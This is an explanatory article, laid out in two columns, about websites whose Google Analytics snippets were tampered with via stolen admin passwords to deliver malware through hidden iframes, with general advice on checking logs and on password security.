| How heart-wrenching is it to find out after adding | | | | Google support staff in the support forum. The |
| Google Analytics to your website that the added code | | | | Support Staff gave actual names of programs and |
| contains malicious codes, designed to download | | | | websites suspected of delivering viruses to |
| viruses on your visitors' computers? Not very pleasing! | | | | compromised websites. |
| Well, that is exactly what is happening to many | | | | Scripts distributed by malicious websites deliver codes |
| website owners who have added the Google | | | | that create hidden iframes that are loaded directly |
| Analytics code to their websites. | | | | from those malicious sites. It is with such mechanism |
| One website owner said that on March 16th, three of | | | | that viruses are downloaded to peoples' computers. |
| his website members reported that his UK-based | | | | One victim of the Google Analytics exploit came |
| website was attempting to download a virus to their | | | | forward and shared his story, saying that he too was |
| computer. The webmaster and his team then | | | | victimized by the Google Analytics exploit, which was |
| deployed a barrage of investigative measures, which | | | | characterized by several days of excessive traffic |
| revealed that it was indeed a piece of malicious code | | | | from an unusual spider that scanned every page on |
| hidden within the Google Analytics tracking code that | | | | his website. |
| was attempting to download the virus to peoples' | | | | He then immediately removed the Google Analytics |
| computers, Google Support Forum. | | | | code from his website and server, which ceased the |
| A Google support staff was quick to point out that he | | | | unusual spider activities. This webmaster's website |
| has in fact seen a multitude of websites being | | | | was ASP-based. This is telling us that it does not |
| compromised in a similar manner, and the actual | | | | make any difference as to what framework the |
| reason for the problem is compromised passwords. | | | | target website is built on, the danger still exist for |
| Therefore, whenever the admin password for | | | | malicious websites to use the Google Analytics as a |
| accessing the said website ends up in the hands of | | | | virus delivery tool! So, this can happen to websites |
| the wrong people, bad things happen. | | | | running ASP, PHP, HTML, etc. |
| These malicious program producers gain access to an | | | | In the event of a Google Analytics exploit, |
| unsuspecting website by using a compromised | | | | webmasters should check their server access logs for |
| password and then plant virus-producing codes within | | | | any kind of suspicious "GET (and POST)" requests. |
| the Google Analytics Javascript code block. Therefore, | | | | These requests will most likely be made by the |
| people should not get the wrong impression and start | | | | suspected malicious program because computer |
| blaming the Google Analytics code for being malicious. | | | | viruses can be injected into websites via the HTTP |
| It is the added code by the perpetrators that is | | | | requests protocol, according to a Google support |
| malicious, not the Google code itself. In effect, it is the | | | | forum member. |
| Google Analytics code that is compromised by the | | | | The rule of thumb for website owners is to always |
| hackers, just wanted to make that clear. | | | | take extra precautions in password security by |
| Therefore, to prevent such a thing from happening on | | | | changing passwords frequently. A name, date of birth, |
| any website, the webmaster of that site should take | | | | or child's birth date should never be used as a |
| extra precautions by periodically changing passwords. | | | | password. In fact, passwords should have letters, |
| While compromised password is one way of exploiting | | | | numbers, and special character combinations to make |
| the Google Analytics code, the Google support staff | | | | them very difficult to figure out. |
| cautioned us that it is not the only method of exploiting | | | | We saw in our discussions that it is not the Google |
| the code while it is on a website. | | | | Analytics code that is totally to blame for the |
| Another method of exploitation is the actual injecting of | | | | downloading of viruses to people's computers. It is |
| malicious scripts by websites indulging in such practices. | | | | password security of websites. |
| An example of such a website was discussed by the | | | | |